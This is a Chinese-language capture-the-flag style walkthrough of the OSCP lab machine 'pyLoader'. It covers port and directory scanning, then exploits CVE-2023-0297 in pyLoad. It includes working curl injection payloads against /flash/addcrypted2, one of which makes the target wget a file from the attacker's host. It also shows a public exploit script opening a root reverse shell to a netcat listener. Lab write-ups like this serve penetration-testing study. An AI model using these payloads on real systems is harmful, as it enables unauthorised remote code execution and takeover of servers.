OSCP靶场–pyLoader
考点(信息收集+CVE-2023-0297)
1.nmap扫描
┌──(root㉿kali)-[~/Desktop]
└─# nmap -Pn -sC -sV 192.168.178.26 --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-28 09:14 EDT
Nmap scan report for 192.168.178.26
Host is up (0.38s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
9666/tcp open http CherryPy wsgiserver
| http-title: Login - pyLoad
|_Requested resource was /login?next=http://192.168.178.26:9666/
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Cheroot/8.6.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.15 seconds
2.user priv
## 目录扫描:
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.178.26:9666/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.178.26-9666/-_24-03-28_09-49-20.txt
Error Log: /root/.dirsearch/logs/errors-24-03-28_09-49-20.log
Target: http://192.168.178.26:9666/
[09:49:21] Starting:
[09:55:50] 401 - 25B - /api/jsonws
[09:55:50] 401 - 25B - /api/jsonws/invoke
[09:55:50] 401 - 25B - /api/login.json
[09:55:50] 401 - 25B - /api/swagger-ui.html
[09:55:50] 401 - 25B - /api/swagger.yml
[09:55:50] 401 - 25B - /api/v1
[09:55:51] 401 - 25B - /api/v2
[09:55:51] 401 - 25B - /api/v3
[09:55:51] 401 - 25B - /api/error_log
[09:55:55] 401 - 25B - /api/swagger
[09:57:17] 200 - 198B - /crossdomain.xml
[09:57:23] 302 - 283B - /dashboard -> /login?next=http://192.168.178.26:9666/dashboard
[09:58:16] 302 - 249B - /favicon.ico -> /_themes/modern/img/favicon.ico
[09:58:19] 302 - 287B - /filemanager -> /login?next=http://192.168.178.26:9666/filemanager
[09:58:20] 302 - 275B - /files -> /login?next=http://192.168.178.26:9666/files
[09:58:22] 308 - 253B - /flash -> http://192.168.178.26:9666/flash/
[09:58:22] 200 - 13B - /flash/ZeroClipboard.swf
[09:58:23] 200 - 13B - /flash/
[09:58:45] 302 - 273B - /home -> /login?next=http://192.168.178.26:9666/home
[09:59:11] 302 - 273B - /info -> /login?next=http://192.168.178.26:9666/info
[09:59:44] 200 - 13KB - /login
[09:59:51] 200 - 13KB - /logout
[09:59:51] 302 - 273B - /logs -> /login?next=http://192.168.178.26:9666/logs
[10:02:05] 200 - 25B - /robots.txt
[10:02:22] 302 - 281B - /settings -> /login?next=http://192.168.178.26:9666/settings
Task Completed
############################
## searchsploit查找漏洞信息查找不到,所以使用google查找exp信息:
## pyload exploit rce
## cve-2023-0297
https://attackerkb.com/topics/4G0gkUrtoR/cve-2023-0297
##############
## 如下响应说明存在漏洞:
┌──(root㉿kali)-[~/Desktop]
└─# curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://192.168.178.26:9666/flash/addcrypted2'
HTTP/1.1 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
Content-Length: 21
Access-Control-Max-Age: 1800
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: OPTIONS, GET, POST
Vary: Accept-Encoding
Date: Thu, 28 Mar 2024 14:12:34 GMT
Server: Cheroot/8.6.0
Could not decrypt key
################
## 再次验证:
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.178.26 - - [28/Mar/2024 10:28:48] "GET /test.html HTTP/1.1" 200 -
┌──(root㉿kali)-[~/Desktop]
└─# curl -i -s -k -X $'POST' --data-binary $'jk=pyimport%20os;os.system(\"wget%20http://192.168.45.171/test.html\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' $'http://192.168.178.26:9666/flash/addcrypted2'
HTTP/1.1 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
Content-Length: 21
Access-Control-Max-Age: 1800
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: OPTIONS, GET, POST
Vary: Accept-Encoding
Date: Thu, 28 Mar 2024 14:28:48 GMT
Server: Cheroot/8.6.0
Could not decrypt key
############################
## 反弹shell:
https://github.com/JacobEbben/CVE-2023-0297/blob/main/exploit.py
##
┌──(root㉿kali)-[~/Desktop]
└─# python3 CVE-2023-0297.py -t http://192.168.178.26:9666/ -I 192.168.45.171 -P 443
[SUCCESS] Running reverse shell. Check your listener!
##############
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.178.26: inverse host lookup failed: Unknown host
connect to [192.168.45.171] from (UNKNOWN) [192.168.178.26] 55538
bash: cannot set terminal process group (905): Inappropriate ioctl for device
bash: no job control in this shell
root@pyloader:~/.pyload/data# whoami
whoami
root
root@pyloader:~/.pyload/data# cat /root/proof.txt
cat /root/proof.txt
12d09f5d8d0f3d8ae9f45c1f8123a5f8
root@pyloader:~/.pyload/data#
主页:测试了sql注入,文件包含,弱密码无果:
查看页面源码:看到可疑的js,进入查看:发现web应用名称
google查找相关漏洞:
检验是否存在漏洞:
反弹shell:
3. root priv
##
https://github.com/JacobEbben/CVE-2023-0297/blob/main/exploit.py
4.总结: